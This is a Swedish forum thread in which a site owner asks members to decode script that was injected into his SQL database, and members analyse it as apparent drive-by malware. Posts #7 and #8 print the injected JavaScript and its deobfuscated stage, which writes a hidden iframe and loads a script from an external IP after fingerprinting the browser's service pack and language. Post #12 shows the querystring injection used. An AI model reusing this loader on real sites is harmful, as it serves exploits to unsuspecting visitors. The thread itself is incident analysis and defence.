webForumDet fria alternativet

Nån som kan dekryptera detta?

14 svar · 887 visningar · startad av Kristianstad

KristianstadMedlem sedan dec. 2002841 inlägg
#1

Hej!

Jag skulle behöva hjälp med att dekryptera en grej. Gå in på >>>URL BORTREDIGERAD<<< och tryck "Visa källa".

Är det nån som kan lista ut vad som döljer sig bakom filen?

Kristoffer

wally_91Medlem sedan feb. 2006511 inlägg
#2

Jag kommer till msn.com :S

colioneMedlem sedan juni 20014 421 inlägg
#3

Vi kan inte se filer i din inbox. Ladd upp den aktuella filen någonstans istället.

KristianstadMedlem sedan dec. 2002841 inlägg
#4

Hej!

Intressant att ni inte ser något på sidan.

Jag bifogar filen. Vore jättetacksam om ni vill ta er en titt på den.

Kristoffer

Mr. N.Medlem sedan sep. 20025 507 inlägg
#5

Suspekt Javascript på sida i Ukraina, det känns tryggt...
http://www.siteadvisor.com/sites/91.203.92.7/postid/?p=905560

There are several hacked websites pointing to 91.203.92.7 to get malware from the website...

Länken i första inlägget borde redigeras bort, för säkerhets skull.

nitro2k01Medlem sedan aug. 20039 342 inlägg
#6

Min undersökning av koden så långt tyder på att koden den riktiga koden är krypterad och att en del av krypteringsnyckeln består av URL'n. Alltså måste jag veta URL'n för att kunna ta reda på vad koden faktiskt gör. (Den URL jag behöver är alltså den URL som sidan ursprungligen sparades från)
Kristianstad, posta URL'n igen, men stäng av Gör automatiskt om URL:er till länkar. längre ner på svarssidan, så ingen klickar på URL'n av misstag.

Det ska väl poängteras att det säkert inte är så nyttigt att besöka den URL'n.

Jag kan bara komma på två anledningar varför man skulle ville gömma koden på detta viset. Antingen så gör koden något elakt eller så är det här en del av någon hackartävling i stil med try2hack. Jag tror på det tidigare.

KristianstadMedlem sedan dec. 2002841 inlägg
#7

Hej igen!

Underbart att du vill hjälpa till! Det är ingen hackertävling, utan ett script som lyckades ta sig in i min sqldatabas. Nedan är den ursprungliga koden och i denna står även länken till den url jag hade ovan (91.203....)

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("banner82=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "banner82=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://91.203.92.7/cgi-bin/index.cgi?inbox width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}
nitro2k01Medlem sedan aug. 20039 342 inlägg
#8

Min analys:
Koden som på urprungsfilen innehåller en kryåterad sträng som i sin tur innehåller en krypterad sträng till. För att dekryptera dessa används dekrypteringsfunktionen och URL'en som nyckel. På det viset hoppas de att ska bli svårare att dekrypera koden för den som har lust med det.
Efter de två lagren kryptering så får man fram denna kod:

<localhost>

document.jmyv7TdV = 1;
document.xbxWjW2a = 1;
document.A2C3579G = 1;

if (!document.I2qEVlzO) {

var gdv2nFDb;
var RMoFbPpl = navigator.appMinorVersion;
var PN9iR7cu = -1
var twKYeYJe = "01";

while((PN9iR7cu = RMoFbPpl.indexOf(";SP", PN9iR7cu+1)) != -1) {
	var L9yHErdx = RMoFbPpl.charAt(PN9iR7cu+3);

	if (L9yHErdx == "1")
		twKYeYJe = "02";
	else if (L9yHErdx == "2")
		twKYeYJe = "03";
	else if (L9yHErdx == "3")
		twKYeYJe = "04";
	else if (L9yHErdx == "4")
		twKYeYJe = "05";
	else if (L9yHErdx == "5")
		twKYeYJe = "06";
	else if (L9yHErdx == "6")
		twKYeYJe = "07";

	if (twKYeYJe != "01")
		break;
}

if (twKYeYJe == "01" && RMoFbPpl.indexOf("Release Candidate", 0) != -1)
	twKYeYJe = "08";

var FfrhMB1O = navigator.systemLanguage.substr(0, 10);
var WrWTUOKd = "";

for(var zbZqPgnv=0;zbZqPgnv<FfrhMB1O.length;zbZqPgnv++) {
	GRoT1vuy = FfrhMB1O.charCodeAt(zbZqPgnv).toString(16);

	if (GRoT1vuy < 2)
		WrWTUOKd += "0";

	WrWTUOKd += GRoT1vuy;
}

while(WrWTUOKd.length < 20)
	WrWTUOKd += "00";

var gdv2nFDb = twKYeYJe + WrWTUOKd;
var Sk6kkUxn = document.createElement("script");
Sk6kkUxn.setAttribute("type", "text/javascript");
Sk6kkUxn.setAttribute("src", "http://91.203.92.7/cgi-bin/index.cgi?f7f3745f000002bc007e11f33906e8e2d11e02bfc44a14ff" + gdv2nFDb);
document.body.appendChild(Sk6kkUxn);
}

Denna kod är specialgjord för IE. (Vad annars?) Koden kollar vilket service pack man har och vilket språk man använder, och skickar sedan en request till en extern server, som uppenbarligen skickar tillbaka kod lämplig för att utnyttja sårbarheter i din version. Spåksträngen används antingen för att vissa språk har sårbarheter, eller för att visa meddelanden på rätt språk och lura användaren.
Hur som haver, längre än så kommer jag inte för tillfället. Jag kan ev skapa en request till sidan för att ladda ner den elaka koden och analysera den vidare.
kan du vara snäll och skriva följande i din adressrad. (I samma version av IE som du använde när buggen skedde)

javascript:navigator.appMinorVersion+" "+navigator.systemLanguage

Det kommer att visa en sträng som du kan kopiera.
Det kan ev hjälpa mig att felsöka vidare.

KristianstadMedlem sedan dec. 2002841 inlägg
#9

Hej!

Någon bugg vet jag inte om det är i min webbläsare - för det händer inget när jag kör scriptet.
Strängen är 0 sv

Däremot är jag orolig att den kan ha drabbat mina besökare något?

nitro2k01Medlem sedan aug. 20039 342 inlägg
#10

Kristianstad skrev:

Hej!

Någon bugg vet jag inte om det är i min webbläsare - för det händer inget när jag kör scriptet.
Strängen är 0 sv

Om du inte har en bugg i din webbläsare, hur tusan kom då någon åt din SQL-server? :q

Kristianstad skrev:

Däremot är jag orolig att den kan ha drabbat mina besökare något?

Tja, ingen aning, eftersom jg inte vet vad koden har gjort med din databas.
Kör du DB-servern på samma dator som du surfar från?

Mr. N.Medlem sedan sep. 20025 507 inlägg
#11

Ja, det här är vad jag har förstått ett vanligt tillvägagångssätt nuförtiden: använd SQL-injektioner eller elaka reklambanners för att plantera skadlig kod på en i vanliga fall legitim hemsida, ex. TV4.se. Sen sprids det onda saker. Jag klickade mig av misstag in på en sida som enligt uppgift installerade en keylogger (det var på World of Warcrafts officiella forum, tidigare kapade WoW-konton används för att posta länkar) och den källan såg ganska exakt ut som filen du bifogade, därför ringde varningsklockorna direkt när jag såg den skumma koden. Förmodligen räddades jag av att jag använde Opera, även om jag har hört om folk som blivit keyloggade trots att de inte använt IE.

KristianstadMedlem sedan dec. 2002841 inlägg
#12

Det som hänt var att jag en morgon upptäckte detta script tillagt i varje kolumn i min tabell, typ
Kalle<script src=......
Kristoffer<script src=.....

Sån tur var har aldrig detta körts av användarna, utan istället skrivits ut som vanlig text (HTMLencode).

Vad jag förstås funderade över var hur tusan detta kan ha kommit in i databasen och letade i loggfilerna. Inte ett enda '-tecken, inte ett enda declare, eller liknande.

Däremot lade ett skumt ip-nummer från Ukraina in på min sajt genom at lägga till <script src="...."></script> i Querystring, ex.
film.asp?ID=4<script src="...."></script>

Kan javascriptet i sin tur ha innehållit kod till en sql injection?

KristianstadMedlem sedan dec. 2002841 inlägg
#13

Tillägg:
SQL Server är inte lokalt i min dator, utan på ett webbhotell.

colioneMedlem sedan juni 20014 421 inlägg
#14

Hur tar du emot datan på den aktuella sidan? Klipp gärna ur koden fram till sql-satsen för att hämta ut datan.

@ndersMedlem sedan juni 200032 969 inlägg
#15

Känns som en rätt vanlig sql injection attack, som uppstår i lite olika varianter från lite olika ställen. http://www.f-secure.com/weblog/archives/00001427.html

mvh

129 ms totalt · 3 externa anrop · v20260731065814-full.30151723
0 ms — hämta forumlista (cache)
0 ms — hämta statistik (cache)
127 ms — hämta tråd, inlägg och bilagor (db)